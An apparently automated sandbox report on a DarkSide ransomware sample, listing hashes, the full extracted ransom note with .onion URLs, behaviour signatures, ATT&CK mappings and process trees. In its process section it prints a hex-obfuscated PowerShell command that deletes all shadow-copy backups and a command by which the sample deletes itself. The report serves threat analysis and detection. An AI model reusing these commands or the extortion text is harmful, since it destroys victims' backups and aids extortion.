darkside | 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61

General

Target

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Size

59KB
MD5

cfcfb68901ffe513e9f0d76b17d02f96
SHA1

766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f
SHA256

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
SHA512

0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\\README.341d6443.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 90 GB data. These files include: Finance data Insurance data Buchgalting Data Banking data and details, bank contracts, creditors info Much personal data Marketing data Production, Technik data Email conversations dump and more others. All documents are fresh (last 365 days) and stored on our offline servers. All data will be published piece by piece. First data pack will be published in 7 days if we do not come for agreement. Your personal leak page: http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF On the page you will find examples of files that have been stolen. The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH When you open our website, put the following data in the input form: Key: rIzr2nCuqbQL7MGMwoppaucqSp5AZufUiYhssYa1SGfO0XFf09fBDlLDWgKQSnnvIAfqYTsOgUhOTxzbxGsC9nH0yk2HOFhn7t8ntX8L0evyce8vKdgUKF7Xvjn6ljaQQ4HPEfPZFP2jvN0DgBVWl2WgNT1U3owZ1bNBjps34t33ObZc01Ce1yKx5CSlwUYbw1ktjqt5d7R9DwRL3NIGrTHvMX3qXI5aBAUnirnc4zHtfGPXq4CuFoh04Tv7VE81aohfvuz8D7wo7i28sbILoJyF6mzeQwSkAXolOhXKQAEPsGcdbfLxfY5uILkHB3d1gAyxT1owQXsY4heNQbY3yYL1Em7dDaLdbNhOf0adYWFiFfAl9EwLDRT96L9Xzsk17ho1B82wOWZ79ZqtT8yqnZ4APJb1LO91ASSsgUdNvR0lAaZTfXHHxUI1vDm5ygyV7cbxMlrQ5K1U6ughdd5WosogMJWVNjreirhzuDzY6SnixtukGYG0D9azzgOHcgidJcLV4n0orhzIaA1SMNYOpdOIadgBehCaHwEyr3hn8CEa6fgpUgK6E95 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF

http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside

Modifies extensions of user files 4 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\RepairProtect.png => C:\Users\Admin\Pictures\RepairProtect.png.341d6443	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
File opened for modification	C:\Users\Admin\Pictures\RepairProtect.png.341d6443	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
File renamed	C:\Users\Admin\Pictures\PushDebug.tif => C:\Users\Admin\Pictures\PushDebug.tif.341d6443	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
File opened for modification	C:\Users\Admin\Pictures\PushDebug.tif.341d6443	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1364 cmd.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1364	cmd.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\341d6443.BMP"	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\341d6443.BMP"	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe

pid process

1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe

Modifies Control Panel 1 IoCs

evasion

Processes:

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallpaperStyle = "10"	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe

Modifies registry class 5 IoCs

Processes:

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443\ = "341d6443"	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\341d6443	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\341d6443.ico"	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exe17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe

pid	process
1768	powershell.exe
1768	powershell.exe
1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exepowershell.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeSecurityPrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeTakeOwnershipPrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeLoadDriverPrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeSystemProfilePrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeSystemtimePrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeProfSingleProcessPrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeIncBasePriorityPrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeCreatePagefilePrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeBackupPrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeRestorePrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeShutdownPrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeDebugPrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeSystemEnvironmentPrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeRemoteShutdownPrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeUndockPrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeManageVolumePrivilege	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: 33	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: 34	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: 35	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeBackupPrivilege	1060	vssvc.exe
Token: SeRestorePrivilege	1060	vssvc.exe
Token: SeAuditPrivilege	1060	vssvc.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe

description	pid	process	target process
PID 1212 wrote to memory of 1768	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe	powershell.exe
PID 1212 wrote to memory of 1768	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe	powershell.exe
PID 1212 wrote to memory of 1768	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe	powershell.exe
PID 1212 wrote to memory of 1768	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe	powershell.exe
PID 1212 wrote to memory of 1364	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe	cmd.exe
PID 1212 wrote to memory of 1364	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe	cmd.exe
PID 1212 wrote to memory of 1364	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe	cmd.exe
PID 1212 wrote to memory of 1364	1212	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
"C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe"
1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\17139A~1.EXE >> NUL
2⤵
- Deletes itself
PID:1364

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1060

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

1

T1081

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
6f8088c66ec2be86eeac0108dc183e64

SHA1
ba12519221c27cf86a9f0639994a361a3415d420

SHA256
2c0d42f9db1946c4b3312ef7eda65db8b427dcda9d6e2133921d4a583a30e1c5

SHA512
542a1acb7bad4d1bb48cc3770ecaa39023a973c8077c8935ce18683f5e79f33a1f83309143bf673338882f4d19a9e79ed75056fe5ff78848fad1f763e80ad973

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
f77ba8b50b139afd34a4114516a824b3

SHA1
641f04444f79b2abd711f8dc709220177cad932f

SHA256
e0a9abf09b82cb21e0e98b04b4f41eb314f8c6e4f4cf3c7b1159445534b62c08

SHA512
62b5aa138f6b1f469a24ca589b4855610a0e29d43ddb7095b1f307a21823a8061aed9ff5b9668389c944cc1fc2aaf4369a8bfc81bd83c55f81bfb8407b4217c7

Download Submit
memory/1212-59-0x0000000076661000-0x0000000076663000-memory.dmp

Filesize
8KB

Download
memory/1364-72-0x0000000000000000-mapping.dmp

Download
memory/1768-65-0x000000001AA20000-0x000000001AA22000-memory.dmp

Filesize
8KB

Download
memory/1768-64-0x000000001A8F0000-0x000000001A8F1000-memory.dmp

Filesize
4KB

Download
memory/1768-63-0x000000001AAA0000-0x000000001AAA1000-memory.dmp

Filesize
4KB

Download
memory/1768-66-0x000000001AA24000-0x000000001AA26000-memory.dmp

Filesize
8KB

Download
memory/1768-67-0x00000000024F0000-0x00000000024F1000-memory.dmp

Filesize
4KB

Download
memory/1768-68-0x000000001C320000-0x000000001C321000-memory.dmp

Filesize
4KB

Download
memory/1768-69-0x000000001C5F0000-0x000000001C5F1000-memory.dmp

Filesize
4KB

Download
memory/1768-62-0x000000001A840000-0x000000001A841000-memory.dmp

Filesize
4KB

Download
memory/1768-61-0x000007FEFBDC1000-0x000007FEFBDC3000-memory.dmp

Filesize
8KB

Download
memory/1768-60-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads